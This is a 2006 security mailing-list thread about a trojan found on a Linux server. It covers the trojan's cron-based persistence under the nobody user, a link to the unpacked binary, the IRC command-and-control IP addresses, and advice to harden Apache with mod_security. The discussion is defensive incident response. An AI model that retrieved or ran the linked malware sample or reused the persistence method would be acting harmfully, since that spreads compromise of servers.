[Full-disclosure] Trojan found on Linux server
After having a customer report that he had large amounts of outbound traffic from one of his Linux servers, I began to investigate and found a trojan. The trojan had created a crontab for the nobody user (Apache was running as nobody and, while I did not take the time to verify I believe that Apache was probably the way the intruder got in) which, at 24 minutes after the hour, would write itself out to /tmp/ummtodkhk and then execute itself. The /tmp/ummtodkhk file was packed with UPX. It has been unpacked and made available at http://www.jeremygaddis.com/files/ummtodkhk. It was submitted to VirusTotal, but nothing identified as anything known. The results of `crontab -l -u nobody nobody.cron` are available at http://www.jeremygaddis.com/files/nobody.cron. -j -- Jeremy L. Gaddis, GCWN, Linux+, Network+ LinuxWiz Consulting http://www.linuxwiz.net/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Trojan found on Linux server
On 1/2/2006 10:31 PM +0200, Gaddis, Jeremy L. wrote: After having a customer report that he had large amounts of outbound traffic from one of his Linux servers, I began to investigate and found a trojan. The trojan had created a crontab for the nobody user (Apache was running as nobody and, while I did not take the time to verify I believe that Apache was probably the way the intruder got in) which, at 24 minutes after the hour, would write itself out to /tmp/ummtodkhk and then execute itself. The /tmp/ummtodkhk file was packed with UPX. It has been unpacked and made available at http://www.jeremygaddis.com/files/ummtodkhk. It was submitted to VirusTotal, but nothing identified as anything known. The results of `crontab -l -u nobody nobody.cron` are available at http://www.jeremygaddis.com/files/nobody.cron. -j Hi Jeremy, This is a much seen thing these days. Your customer probably got attacked by an insecure php script (cacti/xmlphp/awstats/ect). Check your apache logs. if I grep my logs for wget, I see tons of attempts. The trojan is a an irc drone, listinging for ddos commands/ect. Regards, Niek ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Trojan found on Linux server
Niek wrote: This is a much seen thing these days. Your customer probably got attacked by an insecure php script (cacti/xmlphp/awstats/ect). Check your apache logs. if I grep my logs for wget, I see tons of attempts. Roger that. It wasn't important enough to us to pursue. I just recently signed on with this customer and was in the process of moving their websites over to new, freshly installed servers from the Red Hat Linux 9 boxes they were running on. Since we're about to rebuild the server anyways, it wasn't worth the time to pursue. The trojan is a an irc drone, listinging for ddos commands/ect. Yep, when running strings on it I noticed a few IP addresses (219.133.46.212, 61.211.239.84, 64.239.9.236) in there as well as commands indicative of IRC (NOTICE, NICK, PRIVMSG, etc.) -j -- Jeremy L. Gaddis, GCWN, Linux+, Network+ LinuxWiz Consulting http://www.linuxwiz.net/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Trojan found on Linux server
Yep, when running strings on it I noticed a few IP addresses (219.133.46.212, 61.211.239.84, 64.239.9.236) in there as well as commands indicative of IRC (NOTICE, NICK, PRIVMSG, etc.) 64.239.9.236 = copticpope.tv http://64.239.9.236/ http://copticpope.tv heh? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Trojan found on Linux server
if I grep my logs for wget, I see tons of attempts. you should use mod_security then. It blocks off all those script kidz and worms. sure a clever person is able to circumvent that too, but most of such scans are made by kids and worms so just configure mod_security for apache :-) regards, sk GroundZero Security Research and Software Development http://www.groundzero-security.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
